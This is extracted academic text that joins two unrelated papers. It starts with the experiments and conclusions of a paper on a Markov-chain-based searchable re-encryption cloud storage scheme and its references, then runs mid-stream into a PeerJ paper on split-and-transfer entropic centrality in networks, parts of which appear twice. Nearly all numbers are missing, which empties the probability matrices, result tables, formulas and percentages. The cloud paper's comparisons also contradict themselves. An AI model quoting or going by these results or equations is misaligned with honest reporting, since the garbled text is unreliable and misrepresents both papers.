whether the data would be stored in the node or not depends on the capacity of the node. the greater the capacity of the node is, the greater the probability that the data will be stored in this node. therefore, when the capacity of the node is very different, the node with large capacity in the system would be overloaded. according to the analysis above, the storage cost of each storage node in the cloud system is measured from the perspective of probability. moreover, the dynamic copy mechanism is adopted to adjust the number of copies in the storage strategy and their placement in real time according to the system performance requirement, load and so on. with the probability of passing the markov chain, the dynamic replica mechanism can be used to complete data storage in time. the reliability and availability of srecsm are improved effectively. the storage group is used as the hardware architecture of the cloud storage system. moreover, the storage group system is connected in the irregular network. the architecture of the storage group is shown in figure . the pc is used as a storage medium in the storage group. however, the reliability of the pc is not high, and it will even fail when the data are stored. therefore, a copy is required to ensure that the data is reliable. according to the reliability criteria of the system, the storage state of the cloud system is divided into three types: small file status, large file status and secondary file status between the two. figure . the system architecture diagram of the storage group in the storage group system, all information about adjacent nodes is stored in every pc. the storage nodes needed can be found quickly through querying the information stored in the nodes. according to the transfer probability matrix and state distribution matrix of the srecsm described precious, the storage strategy of a certain time is predicted. the structure of storage space in the storage group is ring, and at the same time, the method of the unified addressing is adopted. in the storage group, the difference in performance of the pc can be offset by the virtual contiguous storage space. first, the hash algorithm message-digest is used to implement system address conversion. the actual physical address is processed and converted to -bit information string through the md algorithm. and then these information strings are stored in the virtual continuous international journal of advanced network, monitoring and controls volume , no. , address. thus, the differences in performance between devices will be offset. the converted address is mapped to the virtual storage space loop of the storage group through the md algorithm. the device is found in the clockwise direction, and then the data is stored in the first pc mapped. therefore, the data is backed up to two adjacent pc. the larger the amount of data in the system, the more uniform the spatial distribution will be. the data are stored when the routing of the corresponding pc and adjacent pc are updated. the routing information table is shown in table ii. table ii. routing table field type length note id int serial number fname varchar filename fsize int file size ip varchar ip address the ip address of the pc device where the file replica located is stored in the ip field in the routing information table. the ip field is the routing information for the adjacent pc. however, once a node fails, all the information stored in the node are backed up and the routing information of the adjacent node is modified in time. according to the principle of the consistency hash algorithm, the storage space of the new pc device will be mapped to the new virtual address space when a new device needs to be added to the storage group. the existing space on the ring will not be changed, and this method can be very effective in avoiding the vibration of the address space. meanwhile, the routing information on the adjacent pc is updated. the process of adding a pc is as shown in figure . the ip address of the adjacent pc is got by broadcast the virtual address is obtained through the consistency hash algorithm update the routing table update the routing table of the adjacent pc figure . the process of adding a pc b. experiments and result analysis the proposed scheme srecsm searchable re-encryption cloud storage method based on markov chain was developed by using the java coding in the linux platform. finally evaluation of the overall performance of the proposed scheme in the real time data applications is done. this proposed scheme involved data owners and data users. data owners create the encrypted data and then re-encrypted data will be forwarded to the cloud storage servers. data users will decrypt the data using the keyword and private key. in this section, we analyzed the prediction, the searching time, searching efficiency and storage space while performing moving, copying, encryption, decryption, and re-encryption operations. the final results are compared with the existing techniques such as cres cloud-based re-encryption scheme, mres searchable encrypted data file sharing scheme. ) prediction of srecsm srecsm based on markov chain is processed by class dynamo system model. on the basis of the thought and model mentioned above,the algorithm is implemented in python and verified by example. the simulation experiment is only to verify the markov characteristics of distributed storage strategy. at first, the monte carlo method is used to simulate times and intervals each time. the distribution of storage state in these intervals and the change of storage status between adjacent intervals are counted. the state transfer probability matrix of the stored strategy is shown in formula ( ).             . . . . . . . . . p  the meaning of the state transfer probability matrix p is described as follows. suppose the last time the cloud system is in a small file storage state. at the next moment, the probability of . is kept in a small storage state; the probability of . is transferred to the secondary storage international journal of advanced network, monitoring and controls volume , no. , state; and the probability of . is transferred to the large storage state. the storage group in figure contains nodes. because the hardware performance, load situation and network link state of the storage nodes in the cloud system are different, the storage cost of each node is different. assuming at the initial moment t , the storage costs for large, medium, and small storage states are s , s and s respectively. the storage status distribution matrix   r of the cloud storage system at time t can be obtained through formula ( ). the storage status distribution matrix   r is shown in formula ( ).                                                . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t s s s r  the formula ( ) ( ) is substituted into formula ( ), and a one-step storage state distribution matrix is obtained, which is shown in formula ( ).                                     . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r  after a multi-step transition, the storage state distribution matrix  ir at time i t is predicted quickly, which is shown in formula ( ).                                     . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ir  the node with the lowest storage cost can be quickly selected by using the storage status distribution matrix introduced in equation ( ), which can realize real-time data storage. ) uploading and downloading of srecsm the data response tests are performed on file upload, file copy and file movement, for large files and small files respectively. experimental results demonstrate that the page is properly displayed, and the response time of the login page is basically completed within two seconds. the percentage of the response time for the transaction is shown in figure . figure . the percentage of the response time for the transaction through the analysis of figure , it can be known that percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. the experimental results show that the system responds fast. the international journal of advanced network, monitoring and controls volume , no. , average response time of the transaction is obtained from the diagram. although one of the response timing of transaction is longer, however the response time for most other transactions is acceptable. when this happens, it is thought that the performance of the mobile cloud storage system is better. table iii and table iv are the test result. table iii. the performance of the mobile end upload the data type of test utilization rate of mobile cpu(%) transmissi on rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . table iv. the performance of the mobile end download the data type of test utilization rate of mobile cpu (%) transmissio n rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . the ratio of cpu occupancy to upload speed is shown in table iii, which the data on the mobile side are tested before the encryption and after the encryption respectively. the ratio of cpu occupancy to download speed is shown in table iv, which the data on the mobile side are tested before the decryption and after the decryption respectively. it can be known from the table iii and the table iv, if the encryption and decryption mechanism are used for hdfs transmission, then the cpu utilization will be increased by an average of % ~ % and the overall file transfer rate will be reduced by % ~ %. as we can see,when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. ) encryption and re-encryption after applying the keywords, based on that proposed scheme it will search the keyword. if it matches, data users will receive their respective data. based on the searching time and the storage space comparison graph has discussed below. data users considered for the proposed scheme is users and the available search keyword vary from to . cloud servers storage space obtain more than bytes and it uses the database to store all the encrypted data and the keywords. there are two questions to be considered: one is the impact of encryption and decryption on file speed. the other is the impact of encryption and decryption on the performance of the client host. the experimental data are listed in table v, which includes the time spent on encrypting the different sizes or different type files by using srecsm and the time spent on transmitting the file in hdfs. table v. time comparison on encryption and decryption by using srecsm file size (m) file type srecsm encryption (ms) hds upload (ms) srecsmdec ryption(ms) hds download (ms) . pdf . mp . mkv . doc . rmvb it can be concluded from the above test data, the time spent on encryption or decryption by using srecsm is regardless of the file type. the time comparison on srecsm encryption and re-encryption is shown in figure . we can see from figure that there is little difference between encryption time and re-encryption time. figure . time comparison on srecsm encryption and re-encryption international journal of advanced network, monitoring and controls volume , no. , the same size files are encrypted by different cres cloud-based re-encryption scheme, mres manager-based re-encryption scheme, or srecsm algorithms and then the re-encryption time is different, as shown in table vi and figure . the . mb file in table vi is the test case. table vi. time comparison for different algorithm encryption file size(m) mres re-encrypt(ms) cresre-encry pt(ms) srecsmre-en crypt(ms) . . . . figure . comparison of re-encryption time in the srecsm proposed in this paper,the time of encryption or decryption is relatively short. file transferring have little impact on total time loss and user experience. it may take a relatively long time to encrypt files by using the cres, which cause a significant additional time overhead for hdfs. however, the encryption time that mres encrypting the file was not significantly increased compared to srecsm. besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. in the next experiment, we compared the searching time, searching efficiency and storage space while performing the encryption and re-encryption operations. figure . storage spaceversus number of keyword figure shows that the comparison graph of storage space in different algorithms. when there is increasing of the number of keywords, it requires more storage space. the existing algorithms cres, mres have require more storage space. but the proposed searchable re-encryption cloud storage method (srecsm) reduce the storage space requirement and utilize the data transfer effectively. figure . searchingtimeversus number of keyword figure shows that the comparison graph of the searching time and number of keywords. the number of keyword vary from to . when the number of keyword increases, searching time also increase. in previous techniques, cres and mres use the more searching time. however, srecsm uses lesser time to search the data. if searching word is not matched, immediately the proposed srecsm uses the editing values. based on this different cases, the proposed srecsm decreases the searching time. mres, cres, and srecsm offload the re-encryption operations on cloud. therefore, in this experiment we examined the turnaround time and energy consumption on cloud while performing the re-encryption operations. the experimental results are shown in fig. . international journal of advanced network, monitoring and controls volume , no. , figure . comparison while performing re-encryption and decryption it can be observed from the results presented in figs. a and b that the increase in the size of file increases the turnaround time and energy consumption for completing the re-encryption operations on the mobile device. the increase in turnaround time and energy consumption is due to the increase in number of re-encryption operations while increasing the number of files. however, figs. c and d show that the increase in the size of file increases the turnaround time and energy consumption for completing the decryption operations on the mobile device. the increase in turnaround time and energy consumption is due to the increase in number of decryption operations while increasing the size of files. using the reliability model formula ( ) of the cloud storage system proposed in . , combine the time required for processing the same size of file in table iv, when a different algorithm cres, mres and srecsm is used, the encryption time required for encrypting file, after that the encryption time is reversed, j a then be got after the encryption time is normalized. in the same way, after normalizing, storage cost k a is got. if both j a and k a are closer to , and the number of storage state in the cloud storage system is larger, then the reliability of the system is higher. according to the above analysis,the data in one hour is sampled continuously, combined with the data in table iv and table v, the reliability contrast diagram for srecsm is shown in figure . figure . the reliability contrast diagram it can be know the reliability of the system through different algorithm by comparing the data in figure . by using the cres re-encryption, the reliability values are almost maintained at one. the reliability of the system is relatively high. that is, it has little impact on file transfer and user experience by using cres re-encryption. it may take a relatively long time to re-encrypt files by using the mres. and the reliability is very jitter. it is shown that the reliability is low with mres re-encryption. however, the re-encryption time that mres combined with cres for re-encrypting the file was not significantly increased compared with cres. the value of the reliability is consistent with the use of cres, which can be maintained around one. it is concluded that the system is relatively reliable by using srecsm encryption. through these simulation experiments, it is verified that srecsm has a good user experience. it is also verified that the mechanism of srecsm can effectively improve the efficiency of the cloud storage. when a mobile terminal makes a request, the optimal node is selected and then the time can be saved effectively. in the srecsm presented in this paper, the re-encryption and decryption has the following characteristics: transport security and storage security of the user data are guaranteed. the mobile finishes the re-encryption before calculating the checksum, so the re-encryption will not break the hdfs data integrity check mechanism. in the entire distributed file storage system, the re-encryption and decryption are international journal of advanced network, monitoring and controls volume , no. , scattered to the various mobile devices. while this will cause some performance damage to the mobile, there is no additional performance penalty for name node and data node. vi. conclusions and future work cres and mres re-encrypts the keyword to transmit safety. but these two schemes are more complex and need more time to re-encrypt. to optimize the cloud storage, safety transmission, minimize the cost and searching time, here we have proposed a new scheme as searchable re-encrypted data in srecsm. this proposed searchable re-encryption method supports the periodical and secure prediction by using the steady markov strategy in stages and determine the lowest storage cost. srecsm increases the storage requirement, flexibility and reduce the security issues, overhead ratio and minimize the cost and searching time. the srecsm based on markov chain proposed in the paper has high reliability proved through a series of simulation experiments. the comparison graph evaluate the turnaround time and energy consumption with the different size of files. by increasing the size of files, proposed srecsm can achieve accurate predictions, reduce the storage space requirement and the re-encrypting time. and then the data is scheduled to be stored in the node with the lowest storage cost. finally conclude that the sedfs proposed in this paper has better security and reliability. and this srecsm reduces the storage space requirement, security issues, searching time and increases the searching efficiency. acknowledgment foundation item: the industrial research project of science and technology department of shaanxi province(grant no. ktzdgy - ); laboratory fund of xi 'an technological university (gsysj ) references [ ] karel, ferreira, denzil,goncalves, jorge,kostakos, vassilis, de moor, katrien: mobile cloud storage: a contextual experiencevandenbroucke.in: mobilehci - proceedings of the th acm international conference on human-computer interaction with mobile devices and services, p - , september , [ ] mitsutaka kimura,xufeng zhao, toshio nakagawa: using markov renewal processes.principles of performance and reliability modeling and evaluation reliability analysis of a cloud computing system with replication, pp. - ( ) [ ] choo, kim-kwang raymond: mobile cloud storage users. in: ieee cloud computing,v , n , p - , september , [ ] iliadis, i., sotnikov, d., ta-shma, p., venkatesan, v.: reliability of geo-replicated cloud storage systems. in: ieee th pacific rim international symposium on dependable computing, pp. – ( ) [ ] jeyanthy, c.,shaji, r.s.,jayan, j.p., symmetric key based cryptic scheme for mobile cloud storage.in: global conference on communication technologies, gcct , p - , november , [ ] jung, kye-dong, moon, seok-jae, kim, jin-mook: data access control method for multimedia content data sharing and security based onxmdr-dai in mobile cloud storage.multimedia tools and applications, v , n , p - , october , [ ] chekam, t.t., zhai, e., li, z., cui, y., ren, k.: on the synchronization bottleneck of openstack swift-like cloud storage systems. in: ieee infocom - the th annual ieee international conference on computer communications, pp. – ( ) [ ] li, l., li, d., su, z., jin, l., huang, g.: performance analysis and framework optimization of open source cloud storage system. china commun. ( ), – ( ) [ ] iliadis, i., sotnikov, d., ta-shma, p., venkatesan, v.: reliability of geo-replicated cloud storage systems. in: ieee th pacific rim international symposium on dependable computing, pp. – ( ) [ ] yu, xiaojun, wen, qiaoyan: design of security solution to mobile cloud storage. advances in intelligent and soft computing, v , p - , [ ] han, lin; huang, hao; xie, chang-sheng: multi-path data prefetching in mobile cloud storage. in: proceedings - international conference on cloud computing and big data, ccbd , p - , march , ; [ ] lee, giwon; ko, haneul; pack, sangheon: an efficient delta synchronization algorithm for mobile cloud storage applications. ieee transactions on services computing, v , n , p - , may-june ; [ ] systemwang, yan; wang, jinkuan: an optimized replica distribution method in cloud storage. journal of control science and engineering, v [ ] zhang, rui; lin, chuang; meng, kun; zhu, lin: a modeling reliability analysis technique for cloud storage system. in: international conference on communication technology proceedings, icct, p - , , icct -proceedings of th ieee international conference on communication technology [ ] chen, ming-hung; tung, yu-chih; hung, shih-hao; lin, kate ching-ju; chou, cheng-fu: availability is not enough: minimizing joint response time in peer-assisted cloudstorage systems. ieee systems journal, v , n , p - , december [ ] tysowski, p.k., hasan, m.a.: re-encryption-based keymanagement towards secure and scalable mobile applica-tions in clouds. iacr cryptology eprint archive , ( ) [ ] zhao, g., rong, c., li, j., zhang, f., tang, y.: trusteddata sharing over untrusted cloud storage providers, pre-sented at the ieee second international conference oncloud computing technology and science (cloudcom’ ), washington, dc, usa ( ) [ ] yang, j., wang, h., wang, j., tan, c., yu, d.: provabledata possession of resource-constrained mobile devicesin cloud computing. journal of networks , – ( ) [ ] itani, w., kayssi, a., chehab, a.: energy-efficient incre-mental integrity for securing storage in mobile cloudcomputing, presented at mailto:kimura@gifu-cwc.ac.jp http://h-s.link.springer.com.lib-ycfw.xatu.edu.cn/book/ . / - - - - http://h-s.link.springer.com.lib-ycfw.xatu.edu.cn/book/ . / - - - - international journal of advanced network, monitoring and controls volume , no. , the international conference onenergy aware computing (iceac ’ ) cairo, egypt( ) [ ] ren, w., yu, l., gao, r., xiong, f.: lightweight andcompromise resilient storage outsourcing with distributedsecure accessibility in mobile cloud computing. tsinghuascience & technology , – ( ) [ ] yu, s., wang, c., ren, k., lou, w.: achieving secure, scalable, and fine-grained data access control in cloud com-puting, presented atthe proceedings ieee(infocom’ )nj, usa ( ) [ ] jia, w., zhu, h., cao, z., wei, l., lin, x.: sdsm: asecure data service mechanism in mobile cloud computing,presented at the ieee conference on computer commu-nications workshops (infocom ’ ) shanghai, china( ) [ ] zhou, z., huang, d.: efficient and secure data storage operations for mobile cloud computing, presented at the thinternational conference on network and service management (cnsm ’ ), az, usa ( ) [ ] ateniese, g., fu, k., green, m., hohenberger, s.: improvedproxy re-encryption schemes with applications to securedistributed storage. acm trans. inf. syst. secur. (tissec) , – ( ) [ ] zhang, yuan; xu, chunxiang; li, hongwei; liang, xiaohui: cryptographic public verification of data integrity for cloud storage systems. ieee cloud computing, v , n , p - , [ ] emura, k., miyaji, a., nomura, a., omote, k., soshi, m.: aciphertext-policy attribute-based encryption scheme withconstant ciphertext length. inf. secur. practice experience , – ( ) [ ] purushothama, b.r; shrinath, b.; amberker, b.b. : secure cloud storage service and limited proxy re-encryption for enforcing accesscontrol in public cloud. international journal of information and communication technology, v , n , p - , [ ] cui, yihui; peng, zhiyong; song, wei; li, xiaojuan; cheng, fangquan; ding, luxiao: a time-based group key management algorithm based on proxy re-encryption for cloudstorage. lecture notes in computer science (including subseries lecture notes in artificial intelligence and lecturenotes in bioinformatics), v lncs, p - , [ ] shao, jun; lu, rongxing; lin, xiaodong; liang, kaitai: secure bidirectional proxy re-encryption for cryptographic cloud storage. pervasive and mobile computing, v , p - , june , [ ] jiang, linmei; guo, donghui: dynamic encrypted data sharing scheme based on conditional proxy broadcast re-encryption for cloud storage. ieee access, v , p - , july , [ ] wang, xuan; xhafa, fatos; hao, wei; he, wei: non-transferable unidirectional proxy re-encryption scheme for secure social cloudstorage sharing. proceedings - international conference on intelligent networking and collaborative systems, ieee incos , p - , october , submitted december accepted august published september corresponding author anwitaman datta, anwitaman@ntu.edu.sg academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright oggier et al. distributed under creative commons cc-by . open access a split-and-transfer flow based entropic centrality frédérique oggier ,*, silivanxay phetsouvanh and anwitaman datta ,* division of mathematical sciences, nanyang technological university, singapore, singapore school of computer science and engineering, nanyang technological university, singapore, singapore * these authors contributed equally to this work. abstract the notion of entropic centrality measures how central a node is in terms of how uncertain the destination of a flow starting at this node is: the more uncertain the destination, the more well connected and thus central the node is deemed. this implicitly assumes that the flow is indivisible, and at every node, the flow is transferred from one edge to another. the contribution of this paper is to propose a split-and- transfer flow model for entropic centrality, where at every node, the flow can actually be arbitrarily split across choices of neighbours. we show how to map this to an equivalent transfer entropic centrality set-up for the ease of computation, and carry out three case studies (an airport network, a cross-shareholding network and a bitcoin transactions subnetwork) to illustrate the interpretation and insights linked to this new notion of centrality. subjects data mining and machine learning, data science keywords entropy, centrality, information flow introduction centrality is a classical measure used in graph theory and network analysis to identify important vertices. the meaning of ‘‘important’’ depends on the nature of the problem analyzed, e.g., hubs in networks, spreaders of a disease, or influencers in social networks. commonly used centrality measures include: the degree centrality which is the degree (or in-degree/out-degree) of the vertex depending on whether the graph is directed, possibly normalized to get the fraction of vertices a given vertex is connected to; the closeness centrality which is the reciprocal of the sum of the shortest path distances from a given vertex to all others, typically normalized, and indicates how close a given vertex is to all other vertices in the network; the betweenness centrality which is the sum of the fraction of all pairs of shortest paths that pass through it, indicating the extent to which a given vertex stands between other vertex pairs (see e.g., estrada, for a survey of different centrality measures and how centralities fit into the more general framework of complex networks). these were extended to weighted graphs, though at the risk of changing the interpretation of the measure, e.g., one may use weighted degrees instead of degrees, but this measure does not count the number of neighbors anymore (see e.g., opsahl, agneessens & skvoretz, for a discussion on using the above cited centrality measures for weighted graphs). another way to determine centrality is to assign as centrality a (scaled) average how to cite this article oggier f, phetsouvanh s, datta a. . a split-and-transfer flow based entropic centrality. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:anwitaman@ntu.edu.sg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. of the centralities of the neighbors. this is the idea behind eigenvector centrality discussed by newman ( ), which was already debated by bonacich ( ), who later generalized it to alpha centrality (bonacich & lloyd, ). alpha centrality introduces an additive exogenous term, which accounts for an influencing factor which does not depend on the network structure. though katz centrality (katz ( )) relies on the idea that importance is measured by weighted numbers of walks from the vertex in question to other vertices (where longer walks have less weights than short ones), it turns out that the alpha centrality and katz centrality differ by a constant term. with these three centralities, a highly central vertex with many links tends to endorse all its neighbors which in turn become highly central. however one could argue that the inherited centrality should be diluted if the central vertex is too magnanimous in the sense that it has too many neighbors. this is solved by page rank centrality, which is based on the pagerank algorithm developed by page et al. ( ). iannelli & mariani ( ) proposed viralrank as a new centrality measure, defined to be the average random walk effective distance to and from all the other nodes in the network. this measure is meant to identify influencers for global contagion processes. benzi & klymko ( ) showed that a parameterized random walk model can capture the behavior of a gamut of centrality measures, including degree centrality (walks of length one) and eigenvector based centrality models (considered as infinite walks), which contain the eigenvector and katz centralities as particular cases. this parameterized model helps explain and interpret the high rank correlation observed among degree centrality and eigenvector based centralities. schoch, valente & brandes ( ) argues that the role of the network structure itself should not be underestimated when looking at correlations among centralities. notwithstanding this high rank correlation among centrality measures, each measure captures the vertex importance subject to a certain interpretation of importance, which is a key rationale behind studying different centrality models in different contexts. a seminal work by borgatti ( ) looked at which notion of centrality is best suited given a scenario, by characterizing the scenario as a flow circulating over a network: a typology of the flow process is given across two dimensions, the type of circulation (parallel/serial duplication, transfer) and the flow trajectories (geodesics, paths, trails, or walks): a flow may be based on transfer, where an item or unit flows in an indivisible manner (e.g., package delivery), or by serial replication, in which both the node that sends the item and the one that receives it have the item (e.g., one-to-one gossip), or parallel duplication, where an item can be transmitted in parallel through all outgoing edges (e.g., epidemic spread). it was shown for example that betweenness is best suited for geodesics and transfer, while eigenvector based centralities should be used for walks and parallel duplication. indeed, betweenness is based on shortest paths, suggesting a target to be reached as fast as possible, and thus fitting transfer. using katz’s intuition, eigenvector based centralities count possible unconstrained walks, and they are consistent with a scenario where every vertex influences all of its neighbors simultaneously, which is consistent with parallel deduplication. this flow characterization is of interest for this work, since we will be looking at a case where a flow is actually not just transferred, but also split among outgoing edges, with the possibility to partly remain at any node it encounters. this scenario could typically be motivated by oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. financial transactions, which are transferred, not duplicated. however when transferred, the flow of money is not indivisible. based on borgatti’s typology, a measure of centrality for transfer should be based on paths rather than eigenvectors. this is indeed the approach that we will explore. our starting point is the notion of entropic centrality as proposed by tutzauer ( ). a (directed) graph g= (v,e) with vertex set v and edge set e is built whose edges are unweighted. to define the centrality of u∈v , the probability pu,v that a random walk constrained to not revisit any vertex (thus, only forming paths) starting at u terminates at v is computed. to model the stoppage of flow/walk at any vertex, an edge to itself (self-loop) is added. the process of computing pu,v is thus to consider a constrained random walk to start at node u, and at every node w encountered in the path, to choose an outgoing edge uniformly at random among the edges leading to unvisited nodes (or choosing the self-loop to terminate the walk). then the entropic centrality ch(u) of u is defined to be ch(u)=− ∑ v∈v pu,vlog pu,v. ( ) this notion of entropic centrality was adapted in nikolaev, razib & kucheriya ( ) to fit a markov model, where instead of paths, unconstrained random walks are considered, for computational efficiency. in general, how to compute centrality at scale is an interesting direction of study in its own right, e.g., fan, xu & zhao ( ), but this is somewhat orthogonal to the emphasis of the current work. in this work we revisit and generalize the original concept of entropic centrality to make it more flexible. to do so, we first interpret the ‘‘transfer’’ centrality proposed in tutzauer ( ) as having ( ) an underlying graph, where every edge has a probability which is that of being chosen uniformly at random among the other outgoing edges of a given vertex, and ( ) an indivisible flow which starts at a vertex u, and follows some path where the probability to choose an edge at every vertex in this path is given by the probability attached to this edge, taking into account unvisited neighbors, to reach v. since the flow is indivisible, the self-loop represents the probability for this flow to stop at a given vertex. in our generalization, we similarly assume that we have ( ) an underlying graph, only now the probability attached to each edge depends on the scenario considered and could be arbitrary, ( ) the flow used to measure centrality can split among neighbors, by specifying which subsets it goes to with which probability, at every vertex it encounters (as per a flow in the traditional network analysis sense, flow conservation applies, meaning that the amount of flow that goes out of u is the same amount of flow that reaches all of its neighbors). again, a self-loop is an artifact introduced to capture the effect of the flow on vertices, even if none of the flow actually remains in the vertex (as in nikolaev, razib & kucheriya, , a zero probability would otherwise render zero contribution to the entropic centrality calculation). while the underlying phenomenon may have self-loops, they may or not be directly used to determine the self-loops needed for the mathematical model. this should be determined based on the scenario being modeled. the above motivates the notion of a split-and-transfer entropic centrality. since propagation of flow is an indicator of spread over the network, we will also consider a scaled oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. version of entropic centrality, where a multiplicative factor is introduced to incorporate additional information, which may suggest an a priori difference of importance among the vertices, for instance, if the data suggests that some vertices handle volume of goods much larger than other vertices. the contributions of this work are to ( ) introduce the above framework for split-and- transfer entropic centrality, ( ) show in ‘the transfer entropic centrality’ that transfer centrality can be easily extended to consider arbitrary probabilities on graph edges and ( ) prove that computing the split-and-transfer entropic centrality can be reduced to transfer entropic centrality over a graph with suitable equivalent edge probabilities (which is crucial from a practicality perspective), as shown in proposition of ‘the transfer entropic centrality’. studies that showcase and explore our technique are provided in ‘case studies’: (i) a cross-shareholding network representing portfolio diversification, that illustrates the versatility of our framework (ii) a subgraph of wallet addresses from the bitcoin network, which originally motivated the study of split-and-transfer flows, and (iii) an airport network. comparisons with other standard centralities (alpha, katz, betweenness and pagerank) are given, showing that the entropic centrality captures different features. the notion of split-and-transfer entropic centrality the transfer entropic centrality consider the network shown on fig. a and assume that the probability of an indivisible flow going from one vertex to another is uniform at random (including the option to remain at the current vertex). for a flow starting at v , there is then a probability to go to v , and a probability to continue to v , so the probability to go from v to v following the path (v ,v ,v ) is . but since it is also possible to reach v from v using v instead, an event of probability , we have that the probability pv ,v for an indivisible flow to start at v and stop at v is pv ,v = . similarly, we compute pv ,v ,pv ,v ,pv ,v and pv ,v , and the transfer entropic centrality ch(u) of u=v is ch(v )= log + log ( )= . by ( ). for a point of comparison, on the right of the same figure, we change the probability to go out of v , such that the edge (v ,v ) is chosen with a probability , while the probability is for using the edges to the other vertices (including a probability that the flow just stays at v itself). the resulting probabilities are provided on fig. b. there is no complication in computing ch(v ) using ( ) with non-uniform probabilities. this reduces slightly the centrality of v , which is consistent with the interpretation of entropic centrality: the underlying notion of entropy is a measure of uncertainty (tutzauer, ), the uncertainty of the final destination of a flow, knowing that it started at a given vertex. imagine the most extreme case where the edge (v ,v ) is chosen with a probability , then even though v has three potential outgoing neighbors, two of them are used with probability , so the centrality of v would reduce considerably, as expected, since there is no uncertainty left regarding the destination of a flow at v . the notion of transfer entropic centrality captured by ( ) assumes that there is no vertex repetition in the paths taken by the flow. figure illustrates this hypothesis. again for oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = ch(v ) = . . (a) v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = ch(v ) ≈ . . (b) figure . the transfer entropic centrality ch(v ) of v is computed using ( ), for a uniform edge distribution (the choice of an edge at a given vertex is chosen uniformly at random among choices of unvisited neighbors) in ( a), and for a non-uniform distribution in ( b). reaches all of its neighbors). again, a self-loop is an artifact introduced to capture the effect of the flow on vertices, even if none of the flow actually remains in the vertex (as in (nikolaev et al. ( )), a zero probability would otherwise render zero contribution to the entropic centrality calculation). while the underlying phenomenon may have self-loops, they may or not be directly used to determine the self-loops needed for the mathematical model. this should be determined based on the scenario being modeled. the above motivates the notion of a split-and-transfer entropic centrality. since propagation of flow is an indicator of spread over the network, we will also consider a scaled version of entropic centrality, where a multiplicative factor is introduced to incorporate additional information, which may suggest an a priori difference of importance among the vertices, for instance, if the data suggests that some vertices handle volume of goods much larger than other vertices. the contributions of this work are to ( ) introduce the above framework for split-and-transfer entropic centrality, ( ) show in subsection . that transfer centrality can be easily extended to consider arbitrary probabilities on graph edges and ( ) prove that computing the split-and-transfer entropic centrality can be reduced to transfer entropic centrality over a graph with suitable equivalent edge probabilities (which is crucial from a practicality perspective), as shown in proposition of subsection . . studies that showcase and explore our technique are provided in section : (i) a cross-shareholding network representing portfolio diversification, that illustrates the versatility of our framework (ii) a subgraph of wallet addresses from the bitcoin network, which originally motivated the study of split-and-transfer flows, and (iii) an airport network. comparisons with other standard centralities (alpha, katz, betweenness and pagerank) are given, showing that the entropic centrality captures different features. the notion of split-and-transfer entropic centrality . the transfer entropic centrality consider the network shown on figure a and assume that the probability of an indivisible flow going from one vertex to another is uniform at random (including the option to remain at the current vertex). for a flow starting at v , there is then a probability to go to v , and a probability to continue to v , so the probability to go from v to v following the path (v ,v ,v ) is . but since it is also possible to reach v from v using v instead, an event of probability , we have that the probability pv ,v for an indivisible flow to start at v and stop at v is pv ,v = . similarly, we compute pv ,v , pv ,v , pv ,v and pv ,v , and the transfer entropic centrality ch(u) of u = v is ch(v ) = log + log ( ) = . by ( ). for a point of comparison, on the right of the same figure, we change the probability to go out of v , such that the edge (v ,v ) is chosen with a probability , while the probability is for using the edges to the other vertices (including a probability that the flow just stays at v itself). the resulting probabilities are provided on figure b. there is no complication in computing ch(v ) using ( ) with non-uniform probabilities. this reduces slightly the centrality of v , which is consistent with the interpretation of / peerj comput. sci. reviewing pdf | (cs- : : : : :new aug ) manuscript to be reviewedcomputer science figure the transfer entropic centrality ch (v ) of v is computed using ( ), for a uniform edge distri- bution (the choice of an edge at a given vertex is chosen uniformly at random among choices of unvis- ited neighbors) in (a), and for a non-uniform distribution in (b). full-size doi: . /peerjcs. /fig- v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = ch(v ) = . . (a) v v v v v pv ,v = pv ,v = pv ,v = pv ,v = pv ,v = + ch(v ) ≈ . . (b) figure . an example of transfer centrality involving already visited neighbors. if probabilities are uniform at random ( a), they are scaled according to the number of unvisited neighbors. if not ( b), they are scaled proportionally to the existing probabilities. entropic centrality: the underlying notion of entropy is a measure of uncertainty (tutzauer ( )), the uncertainty of the final destination of a flow, knowing that it started at a given vertex. imagine the most extreme case where the edge (v ,v ) is chosen with a probability , then even though v has three potential outgoing neighbors, two of them are used with probability , so the centrality of v would reduce considerably, as expected, since there is no uncertainty left regarding the destination of a flow at v . the notion of transfer entropic centrality captured by ( ) assumes that there is no vertex repetition in the paths taken by the flow. figure illustrates this hypothesis. again for the centrality of v , a flow leaves v , it can go to either v , v or v . when reaching v , the flow cannot go back to v , since v is already visited (and going back would not give a path anymore), there the probabilities to stay at v and to go to v from v are modified. on the left, when probabilities are uniform, since now only two outgoing edges of v are available, namely edges (v ,v ) and (v ,v ), each is assigned a probability of . on the right, when probabilities are not uniform, we distribute the probability of going to some visited vertex proportionally to the rest of the available edges. since is going to v while is staying at v , we have and out of respectively leaving and staying, thus obtaining the renormalized probabilities as + = and + = . the examples of figures and illustrate diverse cases of indivisible flow. by definition of indivis- ibility, the choice of an edge at a vertex u corresponds to choosing subsets containing one vertex only in the list of all subsets of neighbors. we can thus set a probability to all subsets which contain more than one vertex. therefore, the definition of entropic centrality in ( ), with or without uniform edge probabilities, are particular cases of the proposed split-and-transfer framework, that we discuss next. . the split-and-transfer entropic centrality consider the network of figure depicting a seller v whose direct customers are v ,v ,v . say we further know that when v distributes a new batch of items, he does so to either customers {v ,v } or {v ,v }, and in fact, the 